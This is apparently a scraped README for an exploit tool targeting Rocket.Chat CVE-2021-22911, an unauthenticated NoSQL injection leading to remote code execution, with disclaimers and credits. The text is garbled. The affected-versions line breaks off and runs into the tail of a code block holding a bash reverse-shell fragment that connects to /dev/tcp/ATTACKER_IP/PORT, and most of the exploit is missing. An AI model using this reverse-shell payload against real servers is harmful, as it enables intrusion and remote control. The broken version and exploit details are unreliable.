## https://sploitus.com/exploit?id=8B4F5527-C9DE-5BFD-9AB2-EC1B6F7017F7
# Rocket.Chat CVE-2021-22911 Exploit
## โ ๏ธ DISCLAIMER - EDUCATIONAL USE ONLY
This exploit is for **authorized penetration testing and educational purposes only**. Unauthorized access to computer systems is illegal. The author is not responsible for any misuse.
## ๐ Overview
**CVE-2021-22911** is a critical unauthenticated NoSQL injection vulnerability in Rocket.Chat that leads to Remote Code Execution (RCE).
- **CVSS Score:** 9.8 (Critical)
- **Affected Versions:** Rocket.Chat & /dev/tcp/ATTACKER_IP/PORT 0>&1"');
}
}
```
## ๐ References
- Original Exploit: [enox - Exploit-DB 50078, 50108](https://www.exploit-db.com/)
- Vulnerability Analysis: [SonarSource Blog](https://blog.sonarsource.com/nosql-injections-in-rocket-chat)
- CVE Details: [CVE-2021-22911](https://vulners.com/cve/CVE-2021-22911)
## ๐ Credits
- **enox** - Original exploit development
- **SonarSource** - Vulnerability research and analysis
## โ๏ธ Legal Notice
This tool is provided for educational purposes and authorized security testing only. Unauthorized access to computer systems is a criminal offense under the Computer Fraud and Abuse Act (CFAA) and similar international laws.
---
**Use responsibly. Only test systems you own or have explicit written permission to test.**